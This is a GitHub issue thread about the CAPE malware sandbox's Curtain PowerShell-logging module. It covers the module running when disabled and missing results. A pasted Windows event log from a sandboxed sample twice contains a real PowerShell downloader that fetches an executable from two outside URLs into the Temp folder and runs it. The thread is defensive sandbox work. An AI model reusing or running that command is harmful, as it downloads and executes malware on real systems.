Should the curtain module run on the guest if it has been disabled in conf file?

<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clip

Curtain running on guest even if not enabled in conf about cape HOT 22 CLOSED

ctxis commented on August 19, 2024

Curtain running on guest even if not enabled in conf

from cape.

Comments (22)

doomedraven commented on August 19, 2024

nop, i will check this

from cape.

enzok commented on August 19, 2024

Are the curtain dependencies listed in the fireeye blog the ones listed in the comments below the blog URL? Or are these in addition to the blog?

from cape.

doomedraven commented on August 19, 2024

in config you have all deps which you need, I would also suggest to upgrade WMF 4 to WMF 5 for powershell5 support

from cape.

enzok commented on August 19, 2024

I see a curtain.log file in my analysis folder, however there is no curtain tab on the results page.

from cape.

doomedraven commented on August 19, 2024

check the log if there are details, if no, you have missing some deps

from cape.

enzok commented on August 19, 2024

there are 2 full events in the log file

from cape.

doomedraven commented on August 19, 2024

can you share it to check? removing your username inside

from cape.

enzok commented on August 19, 2024

<root>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4100</EventID><Version>1</Version><Level>3</Level><Task>106</Task><Opcode>19</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:43.628864400Z'/><EventRecordID>11</EventRecordID><Correlation ActivityID='{02AC0C48-F800-0001-4DBA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='ContextInfo'>        Severity = Warning
        Host Name = ConsoleHost
        Host Version = 5.1.14409.1005
        Host ID = 01199e23-61d0-4e5d-82ac-674361ed7c53
        Host Application = powershell function otpmldctt([string] $beikul){(new-object system.net.webclient).downloadfile($beikul,'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe');start-process 'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe';}try{otpmldctt('http://sabarasourcing.com/mo.bin')}catch{otpmldctt('http://ayuhas.co.in/mo.bin')}
        Engine Version = 5.1.14409.1005
        Runspace ID = 91c2b171-5620-44e6-8180-a7a93a625ec2
        Pipeline ID = 1
        Command Name = Start-Process
        Command Type = Cmdlet
        Script Name = 
        Command Path = 
        Sequence Number = 16
        User = user1-PC\user1
        Connected User = 
        Shell ID = Microsoft.PowerShell
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4100</EventID><Version>1</Version><Level>3</Level><Task>106</Task><Opcode>19</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:42.599262600Z'/><EventRecordID>10</EventRecordID><Correlation ActivityID='{02AC0C48-F800-0001-4CBA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2232'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='ContextInfo'>        Severity = Warning
        Host Name = ConsoleHost
        Host Version = 5.1.14409.1005
        Host ID = 01199e23-61d0-4e5d-82ac-674361ed7c53
        Host Application = powershell function otpmldctt([string] $beikul){(new-object system.net.webclient).downloadfile($beikul,'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe');start-process 'C:\Users\user1\AppData\Local\Temp\ypqrdrb.exe';}try{otpmldctt('http://sabarasourcing.com/mo.bin')}catch{otpmldctt('http://ayuhas.co.in/mo.bin')}
        Engine Version = 5.1.14409.1005
        Runspace ID = 91c2b171-5620-44e6-8180-a7a93a625ec2
        Pipeline ID = 1
        Command Name = Start-Process
        Command Type = Cmdlet
        Script Name = 
        Command Path = 
        Sequence Number = 15
        User = user1-PC\user1
        Connected User = 
        Shell ID = Microsoft.PowerShell
</Data><Data Name='UserData'></Data><Data Name='Payload'>Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform..
Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40962</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>2</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.574455500Z'/><EventRecordID>9</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>53504</EventID><Version>1</Version><Level>4</Level><Task>111</Task><Opcode>10</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.324855100Z'/><EventRecordID>8</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2012'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='param1'>2944</Data><Data Name='param2'>DefaultAppDomain</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40961</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>1</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:38.246854900Z'/><EventRecordID>7</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-32BA-6F6D6814D401}'/><Execution ProcessID='2944' ThreadID='2400'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40962</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>2</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:35.782050600Z'/><EventRecordID>6</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2852'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>53504</EventID><Version>1</Version><Level>4</Level><Task>111</Task><Opcode>10</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:33.644846800Z'/><EventRecordID>5</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2664'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData><Data Name='param1'>3016</Data><Data Name='param2'>DefaultAppDomain</Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>40961</EventID><Version>1</Version><Level>4</Level><Task>4</Task><Opcode>1</Opcode><Keywords>0x0</Keywords><TimeCreated SystemTime='2018-07-05T20:57:33.145646000Z'/><EventRecordID>4</EventRecordID><Correlation ActivityID='{02AC0C40-F800-0000-29BA-6F6D6814D401}'/><Execution ProcessID='3016' ThreadID='2852'/><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>user1-PC</Computer><Security UserID='S-1-5-21-123455678-2586188290-4012863347-1000'/></System><EventData></EventData></Event>
</root>

from cape.

doomedraven commented on August 19, 2024

weird, the log is fine, can you share sample to test here?

from cape.

enzok commented on August 19, 2024

MD5 - 23c982cd033934dd1f173e4e6bcd8c0b if you have access to VT.

I believe I've already submitted to CAPE instance.

from cape.

doomedraven commented on August 19, 2024

ok i just executed standalone curtain on log it returns empty dict
im not sure but i think it related to Error Message = This command cannot be run due to the error: The specified executable is not a valid application for this OS platform.. Fully Qualified Error ID = InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

i will check it better tomorrow

from cape.

doomedraven commented on August 19, 2024

testing your sample

from cape.

enzok commented on August 19, 2024

thanks, I see that it ran on CAPE instance without that error. Not sure why the VM is behaving that way. It's a 64-bit WIn7 w/SP1 and just the curtain dependencies.

from cape.

doomedraven commented on August 19, 2024

win7sp1x32, i think your problem related to that error

from cape.

enzok commented on August 19, 2024

Is there something I need to do to get powershell scripts to run in Windows VMs? I can't seem to get this to run in my 64-bit VM, but it runs on the CAPE instance 64-bit VM just fine.

from cape.

doomedraven commented on August 19, 2024

https://github.com/karttoon/curtain

from cape.

enzok commented on August 19, 2024

@doomedraven Can you give me some context for this? Is this to help troubleshoot why my PS is not executing?

By the way, I am running version 5.1

from cape.

doomedraven commented on August 19, 2024

i got you incorrectly, so it works in vm with cape but not in standalone vm?

from cape.

enzok commented on August 19, 2024

My 64-bit Win 7 VM generates the PS error when I run it on my Cuckoo instance. When I run on the Ctxis CAPE instance on a 64-bit VM it runs without the error. I'm trying to figure out why my 64-bit VM is giving me the PS error.

from cape.

doomedraven commented on August 19, 2024

no idea sorry

from cape.

doomedraven commented on August 19, 2024

@enzok i just checked, the main problem is what the aux conf isn't passed to vm, so it can't be configured, to disable it, you need to set do_run=False in analyzer/windows/modules/auxiliary/curtain.py

from cape.

enzok commented on August 19, 2024

thanks for checking.

from cape.

Curtain running on guest even if not enabled in conf about cape HOT 22 CLOSED

Comments (22)

Related Issues (20)

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent